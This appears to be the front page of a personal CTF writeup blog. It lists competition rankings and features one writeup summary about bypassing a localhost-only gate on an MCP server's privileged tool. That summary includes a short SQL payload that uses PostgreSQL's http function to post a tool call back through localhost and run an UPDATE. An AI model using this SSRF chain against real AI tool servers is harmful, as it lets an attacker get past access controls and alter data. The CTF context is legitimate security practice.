CTF writeups by moeve. Captures, chains and the occasional rabbit hole.
Security & infrastructure engineer in Germany, CTF player by night. I write up the chains I find interesting.
What worked, what didn't, dead ends included.
Featured writeup
Cross-protocol SSRF into MCP guardian tool
MCP server gates a privileged UPDATE tool behind a localhost check. Header spoofing fools the read-only tool; chain it with PostgreSQL's http_post to bounce the call back through 127.0.0.1 and bypass the gate.
ink_vaults.sql
L1–8
1SELECT http(( 2 'POST', 'http://localhost:3000/mcp', 3 ARRAY[ http_header('Authorization', 'Bearer sacred_…') ], 4 'application/json', 5 '{"name":"guardian_query_sql", 6 "arguments":{"query":"UPDATE scrolls SET availability=''Available'' WHERE id=7"}}' 7)::http_request); 8-- spoofed read tool → PG http_post → guardian UPDATE
CTF log
Nov 2025
ctf
Neurogrid CTF: Human-Only★ featured
Beat CAI, the most capable autonomous AI agent at the time · solo
#4
of 1,337
top 0.30%Oct 2025
ctf
Hack The Boo 2025
23/23 solved · 1× first blood · solo
#5
of 2,893
top 0.17%Sep 2025
ctf
Amazon AppSec EMEA 2025
EMEA · invite-only · solo
#16
of 141
top 11.3%May 2026
season
HTB Season 10: Underground
3-month competitive ranking · Claude Code agents, mostly hands-off · solo · agentic
#135
of 12,294
top 1.1%Dec 2025
season
HTB Season 9: Gacha
3-month competitive ranking · solo
#67
of 9,850
top 0.68%Nov 2025
season
OffSec Gauntlet 2025
2-month season · OffSec · solo
#51
of 4,267
top 1.2%Sep 2025
ctf
Holmes Defensive CTF
DFIR · SOC · malware · threat hunting · team Legendary Queue
#118
of 7,085
top 1.7%Mar 2025
ctf
Cyber Apocalypse 2025
Tales from Eldoria · 74/77 · solved: 3 ML, 2 rev, 1 crypto · team DOMBUSTERS
#47
of 8,130
top 0.58%